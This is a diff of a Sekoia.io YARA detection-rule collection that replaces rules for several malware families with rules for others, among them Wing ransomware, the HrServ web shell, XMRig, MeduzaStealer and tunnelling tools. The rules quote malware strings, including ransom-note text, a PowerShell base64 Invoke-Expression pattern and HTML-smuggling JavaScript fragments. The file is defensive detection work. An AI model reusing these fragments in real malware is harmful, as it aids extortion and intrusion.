+		$ = "__non_hooked_symbols"
+		$ = "__hidden_literals"
+		$ = "extract_type_2_socket_inode2"
+		$ = "/proc/%s/fd"
+		$ = "pluginkey" wide
+		$ = "mainpath" wide
+		$ = "hiderpath" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "45c6b272631aa9e0c4b2ba675699b803" or hash.md5 ( pe.rich_signature.clear_data ) == "b33158757dc039859e272f4528e10e80"
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
+rule SEKOIA_Apt_Unk_Hrserv_Webshell_Strings : FILE
 {
 	meta:
-		description = "Detects SideCopy's ReverseRAT"
+		description = "Detects HrServ web shell based on strings"
 		author = "Sekoia.io"
-		id = "383397c9-fd4a-4255-a8f2-27683bdbb7f7"
-		date = "2023-05-11"
+		id = "684fd41c-9ea6-4f4e-8db4-82325a2ff80b"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_reverserat_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_hrserv_webshell_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "be657405b5703dc402b53350aa7ef18529bda3dc44c759585c4cfa1bc1eb76ff"
+		logic_hash = "b5650e08227bbdb82c635bd67abae57e3107be9126639619809bfbe2a7ffee89"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240984,63 +240775,86 @@ rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "downloadexe" wide
-		$ = "creatdir" wide
-		$ = "regnewkey" wide
-		$ = "reglist" wide
-		$ = "regdelkey" wide
-		$ = "clipboardset" wide
-		$ = "shellexec" wide
-		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
+		$ = "open file error!"
+		$ = "create file error!"
+		$ = "[!] CreatePipe failed."
+		$ = "[!] CreateProcess failed."
+		$ = "[!] CreateProcess success,no result return."
+		$ = "; cadataIV="
+		$ = "cadataKey="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 5 of them
 }
-rule SEKOIA_Apt_Konni_Check_Bat : FILE
+rule SEKOIA_Ransomware_Win_Wing : FILE
 {
 	meta:
-		description = "Script used to performs check before executing Konni"
+		description = "Finds Wing ransomware samples based on specific strings"
 		author = "Sekoia.io"
-		id = "f05e6ba2-c128-4c17-8f74-f7640103c859"
-		date = "2023-11-27"
+		id = "c2fe8321-8013-4aa4-91a6-c0face3e6b52"
+		date = "2024-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni_check_bat.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_wing.yar#L1-L52"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "13a9dd6978985eb17960794c6de2ee2e6411e6afeb705ff95ced72bc0efb5d8c"
+		logic_hash = "c9f373c12f4fb5efc29d0f293a2e0b46cf03c1abe124e9dd4118bef6c6e3f731"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ":64BIT"
-		$ = ":32BIT"
-		$ = ":INSTALL"
-		$ = ":EXIT"
-		$ = "netpp.dll"
-		$ = "wpns.dll"
-		$ = "netpp64.dll"
-		$ = "wpns64.dll"
-		$ = "rundll32"
+		$fun01 = "LockBIT" ascii fullword
+		$fun02 = "BigEncrypt" ascii
+		$fun03 = "RunEncrypt" ascii
+		$fun04 = "AesEncrypt" ascii
+		$fun05 = "KeyGenerator" ascii
+		$fun06 = "GetUniqueKey" ascii
+		$fun07 = "SearchFolder" ascii
+		$fun08 = "ThreadFolders" ascii
+		$fun09 = "ContainsKeyword" ascii
+		$fun10 = "ReadMeMaker" ascii
+		$fun11 = "StopAndConfigureSqlServices" ascii
+		$fun12 = "WipeRecycleBin" ascii
+		$fun13 = "TelSender" ascii
+		$str01 = "AnyDesk" wide
+		$str02 = "firebird" wide
+		$str03 = "Acronis" wide
+		$str04 = "config \"" wide
+		$str05 = " start= demand" wide
+		$str06 = "' stopped and configured to start automatically." wide
+		$str07 = "Error processing service '" wide
+		$str08 = "$RECYCLE.BIN" wide
+		$str09 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$str10 = "UniqueID:" wide
+		$str11 = "PersonalID:" wide
+		$ran01 = "C:\\Readme.txt" wide
+		$ran02 = "C:\\LockBIT\\systemID" wide
+		$ran03 = "Your system has been encrypted by our team, and your files have been locked using our proprietary algorithm !" wide
+		$ran04 = "* Please read this message carefully and patiently *" wide
+		$ran05 = "* If you use any tools, programs, or methods to recover your files and they get damaged, we will not be responsible for any harm to your files !" wide
+		$ran06 = "* Note that your files have not been harmed in any way they have only been encrypted by our algorithm." wide
+		$ran07 = "Your files and your entire system will return to normal mode through the program we provide to you. No one but us will be able to decrypt your files !" wide
+		$ran08 = "* To gain trust in us, you can send us a maximum of 2 non-important files, and we will decrypt them for you free of charge." wide
+		$ran09 = "Please put your Unique ID as the title of the email or as the starting title of the conversation." wide
+		$ran10 = "* For faster decryption, first message us on Telegram. If there is no response within 24 hours, please email us *" wide
 
 	condition:
-		filesize < 1MB and 7 of them
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $fun* ) and 5 of ( $str* ) and 2 of ( $ran* ) ) or 12 of ( $fun* ) or 10 of ( $ran* ) or 8 of ( $ran* ) )
 }
-rule SEKOIA_Implant_Mac_Rustbucket : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
 {
 	meta:
-		description = "Detect the RustBucket malware"
+		description = "Detects Gamaredon HTMLSmuggling attachment"
 		author = "Sekoia.io"
-		id = "fcbb745d-7f56-4c51-9db5-427da22a0c68"
-		date = "2023-04-24"
+		id = "e82335ea-48d5-409c-a270-cfd5a2197c44"
+		date = "2023-01-20"
 		modified = "2024-12-19"
-		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mac_rustbucket.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_attachment_stage2.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747"
-		logic_hash = "ab7bc706b0d3f0dcd739ffe7f8153ba7377892143d8d53ce1591519ffe4ae84f"
+		logic_hash = "42e637f628db6719342ae104c6c89bb80609c5f3f5c2586daccb31f7d688a2a1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241048,26 +240862,27 @@ rule SEKOIA_Implant_Mac_Rustbucket : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/Users/hero/"
-		$ = "PATHIpv6Ipv4Bodyslotpath"
-		$macho_magic = {CF FA ED FE}
-		$java_magic = {CA FE BA BE}
+		$ = ") == -1) die();" ascii
+		$ = "'data:application/x-rar-compressed;base64, ' +" ascii
+		$ = ".appendChild(img);" ascii
+		$ = "['Win32', 'Win64', 'Windows', 'WinCE'].indexOf(" ascii
+		$ = " = navigator[\"platform\"];" ascii
 
 	condition:
-		($macho_magic at 0 or $java_magic at 0 ) and all of them
+		4 of them and filesize < 1MB
 }
-rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
+rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
 {
 	meta:
-		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
+		description = "Detects OilRig Malicious Document"
 		author = "Sekoia.io"
-		id = "e992d574-6a44-4bea-97e2-6d5579ce8d01"
-		date = "2022-03-28"
+		id = "cb4ab310-e24c-4edc-8804-0c49c30124fb"
+		date = "2022-05-13"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_360_tct.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_maliciousdocument_may2022.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6b4ca65bc05ea1e8036140a62b94c8b75afe30a5e37cae9a5ae2a9c828cd6275"
+		logic_hash = "d4aa960d4471ddf66ec6f98a5c883177763771ba9960b749509311a05384d9a7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241075,75 +240890,56 @@ rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rar = "Rar!"
-		$str0 = "svchost.txt"
-		$str1 = "rundll3222.exe"
-		$str2 = "ojbkcg.exe"
+		$s1 = "<LogonType>InteractiveToken</LogonType>"
+		$s2 = "Select * From Win32_PingStatus Where Address"
+		$s3 = "She@et1"
+		$s4 = "_VBA_PROJECT" wide
+		$s5 = "This program cannot be run in DOS mode." base64
+		$s6 = ".Agent.pdb" base64
+		$s7 = "GetAgentID" base64
 
 	condition:
-		$rar at 0 and all of ( $str* ) and filesize > 800KB and filesize < 2800KB
+		uint32be( 0 ) == 0xD0CF11E0 and 3 of them
 }
-rule SEKOIA_Manjusaka_Samples : FILE
+rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
 {
 	meta:
-		description = "Detects Manjusaka via protobuf struture names (Windows / Linux / implants / C2)"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "7aa8edb3-2e67-4632-af68-5b65c9aefe39"
-		date = "2022-08-04"
+		id = "428eb021-b37f-4db5-8cab-ca2f6dd2e202"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/manjusaka_samples.yar#L1-L41"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_powershell_infection_chain_1.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "58dcc406c87a8ec66c0904c4cf518cb38bca1aa9058196ce5d496f6269258200"
+		logic_hash = "a849c397e7f61e41ea7e67a265717d7d66f6af42f3d1e930020d1433dd3aab18"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".protos.AgentStatusR" ascii wide
-		$ = ".protos.AgentsR" ascii wide
-		$ = ".protos.FileActionR" ascii wide
-		$ = ".protos.FileEntryR" ascii wide
-		$ = ".protos.HttpFileActionR" ascii wide
-		$ = ".protos.HttpFileEntryR" ascii wide
-		$ = ".protos.PassResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.ConfigH" ascii wide
-		$ = ".protos.AgentUpdateH" ascii wide
-		$ = ".protos.PluginExecH" ascii wide
-		$ = ".protos.PluginLoadH" ascii wide
-		$ = ".protos.ReqCwdH" ascii wide
-		$ = ".protos.ReqCmdH" ascii wide
-		$ = ".protos.ReqListFileH" ascii wide
-		$ = ".protos.ReqCatFileH" ascii wide
-		$ = ".protos.ReqNetStatH" ascii wide
-		$ = ".protos.ReqTaskListH" ascii wide
-		$ = ".protos.ReqScreenH" ascii wide
-		$ = ".protos.FileEventH" ascii wide
-		$ = ".protos.HttpFileEventH" ascii wide
-		$ = ".protos.PassGetEventH" ascii wide
-		$ = ".protos.FileGetEventH" ascii wide
-		$ = ".protos.AgentEventR" ascii wide
+		$ = "command $es ="
+		$ = "function isV"
+		$ = "doIn;"
+		$ = "System.IO.Comp"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 15 of them
+		all of them and filesize < 100KB
 }
-rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
+rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
 {
 	meta:
-		description = "Detects reverse base64 files (explorer.ps1)"
+		description = "Detects XMRig EXE"
 		author = "Sekoia.io"
-		id = "35c3ffb2-2ced-426c-ac3f-a8cd0c357672"
-		date = "2024-02-01"
+		id = "35f203aa-20cd-4235-9ead-b34be14255d5"
+		date = "2024-01-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_explorer_ps1_reverse_b64.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/miner_win_xmrig_strings.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bf13fbf2dbe6a718510f3e435a9fe06517ed962f8e129d79a15e6a301e5713ca"
+		logic_hash = "34aa0da9d3bb277927c87a3745ec9e35881682319c91141da6ff1cff7e0610d9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241151,25 +240947,41 @@ rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\""
-		$s1 = "Wa1VHJ\"[-1..-"
-		$s2 = "-join '')))"
+		$ = "XMRig "
+		$ = "pool_wallet"
+		$ = "IP Address currently banned"
+		$ = "rigid"
+		$ = "diff_current"
+		$ = "shares_good"
+		$ = "shares_total"
+		$ = "avg_time"
+		$ = "avg_time_ms"
+		$ = "hashes_total"
+		$ = "pool address"
+		$ = "ping time"
+		$ = "connection time"
+		$ = "daemon+wss://"
+		$ = "daemon+https://"
+		$ = "daemon+http://"
+		$ = "socks5://"
+		$ = "stratum+ssl://"
+		$ = "stratum+tcp://"
 
 	condition:
-		all of them and $s0 at 0 and @s2 - @s2 < 20
+		uint32be( 0 ) == 0x5A4D and filesize < 15MB and 7 of them
 }
-rule SEKOIA_Spyware_And_Strongpity_Mobile_Backdoor : FILE
+rule SEKOIA_Tool_Dogtunnel_Strings : FILE
 {
 	meta:
-		description = "Detect the mobile backdoor using the name used in the certificate"
+		description = "Detects Dog Tunnel based on strings"
 		author = "Sekoia.io"
-		id = "58ceb85b-d94f-47b2-86e4-59bd41f4fea8"
-		date = "2023-01-16"
+		id = "00705613-6367-454f-b3f2-1e2b0a52459c"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_strongpity_mobile_backdoor.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_dogtunnel_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9005fe938433223f32642f6bbf7c4c58f0b927a006e283c8b12f79103ec02cfc"
+		logic_hash = "04e7141e67ba841b0955b9e36c43be1f5b22e635b96d58b8b1b52fd507ddd929"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241177,71 +240989,80 @@ rule SEKOIA_Spyware_And_Strongpity_Mobile_Backdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Elizabeth Mckinsen0"
+		$ = "pipe.(*UDPMakeSession).doAndWait"
+		$ = "ikcp.ikcp_parse_fastack"
+		$ = "pipe.ListenWithSetting"
+		$ = "pipe.DialTimeoutWithSetting"
+		$ = "common.ReadUDP"
 
 	condition:
-		all of them and filesize > 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 10MB
 }
-rule SEKOIA_Infostealer_Win_Stealerium : FILE
+rule SEKOIA_Hacktool_Gtunnel_Strings : FILE
 {
 	meta:
-		description = "Detects Stealerium based on specific strings"
+		description = "Detects Go gTunnel based on strings"
 		author = "Sekoia.io"
-		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
-		date = "2022-12-01"
+		id = "f20a4400-8ae6-4954-b643-0a8847f037f0"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealerium.yar#L1-L36"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_gtunnel_strings.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f420848164ad4b6966f2a776a58d90b7d70c8b151a42d6f56b654f1700b5e564"
+		logic_hash = "76a67f0487fea7b890863bef06a48f665b611f7659eb374cd83cd4be01b812ab"
 		score = 75
-		quality = 78
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$stl = "Stealerium" ascii wide
-		$str01 = "Processe: " wide
-		$str02 = "Compname: " wide
-		$str03 = "Language: " wide
-		$str04 = "SandBoxie: " wide
-		$str05 = "== System Info ==" wide
-		$str06 = "== Hardware ==" wide
-		$str07 = "== Domains ==" wide
-		$str08 = "WEBCAMS COUNT: " wide
-		$str09 = "[Virtualization]" wide
-		$str10 = "[Open google maps](" wide
-		$str11 = "Remember password: " wide
-		$str12 = "Target.Browsers.Firefox" ascii
-		$str13 = "Modules.Keylogger" ascii
-		$str14 = "ClipperAddresses" ascii
-		$str15 = "ChromiumPswPaths" ascii
-		$str16 = "DetectedBankingServices" ascii
-		$str17 = "DetectCryptocurrencyServices" ascii
-		$str18 = "CheckRemoteDebuggerPresent" ascii
-		$str19 = "GetConnectedCamerasCount" ascii
-		$str20 = "costura.discord-webhook-client.dll.compressed" ascii wide
+		$repo = "github.com/hotnops/gTunnel/" ascii fullword
+		$s1 = "common.(*Tunnel).GetControlStream"
+		$s2 = "common.(*Tunnel).handleIngressCtrlMessages"
+		$s3 = "client..inittask"
+		$s4 = "client.file_client_proto_rawDescGZIP."
+		$s5 = "common.(*SocksServer).Start."
+		$s6 = "client.(*TunnelControlMessage).GetConnectionId"
+		$s7 = "protobuf/reflect/protoreflect.ProtoMessage"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 1MB and ( ( #stl > 5 and 2 of ( $str* ) ) or 15 of ( $str* ) )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe ) and #repo > 200 or 5 of ( $s* )
 }
-rule SEKOIA_Apt_Icepeony_Iceevent : FILE
+
+rule SEKOIA_Apt_Menupass_Maliciouslibvlc_Dll
 {
 	meta:
-		description = "Detects IceEvent Backdoor"
+		description = "Detects the malicious LibVLC variants used by MenuPass"
 		author = "Sekoia.io"
-		id = "7d1f8b90-fde4-4d5c-a8a3-375db8aa88a1"
-		date = "2024-10-21"
+		id = "8b6b56f3-33b5-41cf-8bcb-e653c98718bd"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_icepeony_iceevent.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_menupass_maliciouslibvlc_dll.yar#L3-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "07c291c9cea4430676c303128bbbb8e3"
-		hash = "489b573b37ab8bc74cca3704e723b895"
-		hash = "265f6cf778d26e62903fb295f89507e3"
-		hash = "f5eb28dd29c91cc84818b74d7f138ff6"
-		logic_hash = "8afe4a94513e9aa5d20849153c76cfe5c684c9a529710947930c76098a36540e"
+		logic_hash = "de56e112a477d3a77146f1b84c8aa3e66a382a87f1492dd50aa1de9458b33717"
+		score = 75
+		quality = 80
+		tags = ""
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	condition:
+		pe.DLL and pe.number_of_exports < 15 and for all i in ( 0 .. pe.number_of_exports - 1 ) : ( pe.export_details [ i ] . name contains "libvlc_" )
+}
+rule SEKOIA_Apt_Muddywater_Powgoop_Decoded : FILE
+{
+	meta:
+		description = "Detects decoded PowGoop malware"
+		author = "Sekoia.io"
+		id = "194cb9ef-da96-42b6-a3b5-b0aee7495f2c"
+		date = "2022-01-13"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_decoded.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "6654d8107bb2ad6344f1fa03c6525ed9a0b8e49627787355efe857e80a02eca4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241249,108 +241070,63 @@ rule SEKOIA_Apt_Icepeony_Iceevent : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Created a process" ascii fullword
-		$ = "CreateProcess failed: %d"
-		$ = "bind error:"
-		$ = "Error creating pip: %d"
-		$ = "listen error:"
+		$h1 = "[System.Net.WebRequest]::Create(" ascii wide
+		$h2 = "Headers.Add('Authorization'" ascii wide
+		$h3 = "Headers.Add('Cookie',('value=' + $ec + ';')" ascii wide
+		$h4 = ".GetResponse()" ascii wide
+		$h5 = "GetResponseStream()" ascii wide
+		$c1 = "return (65..90) + (97..122) | Get-Random -Count" ascii wide
+		$c2 = "% {[char]$_}" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		filesize > 1KB and filesize < 1MB and ( $h2 in ( @h1 .. @h5 ) and $h3 in ( @h1 .. @h5 ) and $h4 in ( @h1 .. @h5 ) ) or ( $c2 in ( @c1 .. @c1 + 50 ) ) and true
 }
-
-rule SEKOIA_Implant_Win_Knotweed_Jumplump : FILE
+rule SEKOIA_Infostealer_Win_Meduzastealer : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Finds MeduzaStealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "8f8cec7a-624b-4306-87f4-bde8ccc3a2d0"
-		date = "2022-07-27"
+		id = "1276f485-aa5d-491b-89d8-77f98dc496e1"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_knotweed_jumplump.yar#L3-L75"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_meduzastealer.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a2637a8a082b6a23756da188808405046ae986a5973f64859462c92e9306e6c8"
+		logic_hash = "e81a5a9611662422eb7a87c0c1a370cee6f138fd6169225d969b669337d91a06"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "DllCanUnloadNow"
-		$s2 = "DllGetClassObject"
-		$s3 = "_initterm"
-		$s4 = "__C_specific_handler"
-		$s5 = "HeapFree"
-		$s6 = "EnterCriticalSection"
-		$s7 = "EventUnregister"
-		$s8 = "LeaveCriticalSection"
-		$s9 = "WaitForSingleObject"
-		$s10 = "GetCurrentThreadId"
-		$s11 = "GetLastError"
-		$s12 = "CloseHandle"
-		$s13 = "HeapAlloc"
-		$s14 = "EventRegister"
-		$s15 = "GetProcAddress"
-		$s16 = "DeleteCriticalSection"
-		$s17 = "GetCurrentProcessId"
-		$s18 = "GetProcessHeap"
-		$s19 = "DisableThreadLibraryCalls"
-		$s20 = "Sleep"
-		$s21 = "RtlCaptureContext"
-		$s22 = "RtlLookupFunctionEntry"
-		$s23 = "RtlVirtualUnwind"
-		$s24 = "UnhandledExceptionFilter"
-		$s25 = "SetUnhandledExceptionFilter"
-		$s26 = "GetCurrentProcess"
-		$s27 = "TerminateProcess"
-		$s28 = "QueryPerformanceCounter"
-		$s29 = "GetSystemTimeAsFileTime"
-		$s30 = "GetTickCount"
-		$s31 = "CoCreateInstance"
-		$s32 = "RegCloseKey"
-		$s33 = "GetModuleFileNameW"
-		$s34 = "RegCreateKeyExW"
-		$s35 = "RegSetValueExW"
-		$s36 = "LocalFree"
-		$s37 = "RegOpenKeyExW"
-		$s38 = "OLEAUT32.dll"
-		$s39 = "memcpy"
-		$s40 = "memcmp"
-		$s41 = "memset"
-		$s42 = "LoadLibraryW"
-		$s43 = "OpenProcessToken"
-		$s44 = "DllRegisterServer"
-		$s45 = "DllUnregisterServer"
-		$s46 = "040904B0" wide
-		$api_hash1 = {5D 44 11 FF}
-		$api_hash2 = {4C 77 D6 07}
-		$api_hash3 = {38 68 0D 16}
-		$api_hash4 = {40 DE CE 72}
-		$api_hash5 = {08 87 1D 60}
-		$api_hash6 = {26 C6 0B 1B}
-		$api_hash7 = {0C DC 67 55}
-		$api_hash8 = {AA C5 E2 5D}
-		$api_hash9 = {C6 96 87 52}
-		$api_hash10 = {F8 8E C2 92}
+		$str01 = "emoji" ascii
+		$str02 = "%d-%m-%Y, %H:%M:%S" ascii
+		$str03 = "[UTC" ascii
+		$str04 = "user_name" ascii
+		$str05 = "computer_name" ascii
+		$str06 = "timezone" ascii
+		$str07 = "current_path()" ascii
+		$str08 = "[json.exception." ascii
+		$str09 = "GDI32.dll" ascii
+		$str10 = "GdipGetImageEncoders" ascii
+		$str11 = "GetGeoInfoA" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and pe.number_of_sections == 7 and all of ( $s* ) and 1 of ( $api_hash* )
+		uint16( 0 ) == 0x5a4d and 8 of them and filesize > 500KB
 }
-
-rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
+rule SEKOIA_Tool_Gsocket_Strings : FILE
 {
 	meta:
-		description = "Detect the TONEINS implant used by Mustang Panda"
+		description = "Detects Gsocket based on strings"
 		author = "Sekoia.io"
-		id = "f178217a-ff28-4dd7-9395-f19f3e2e934c"
-		date = "2022-11-28"
+		id = "55fb2f2b-1074-4b6d-9113-48eaeb0e1e27"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_toneins.yar#L4-L44"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_gsocket_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b71932f16ffb1d8d1780b6f9b4db2f0c98d1c770829a4d2284e78c19d37e54bb"
+		logic_hash = "c54308293a9f64b571282eac9fba01e4671ba6b0cd45936fab92d4d9af904bbb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241358,39 +241134,28 @@ rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rtti1 = ".?AVDNameNode@@"
-		$rtti2 = ".?AVcharNode@@"
-		$rtti3 = ".?AVpcharNode@@"
-		$rtti4 = ".?AVpDNameNode@@"
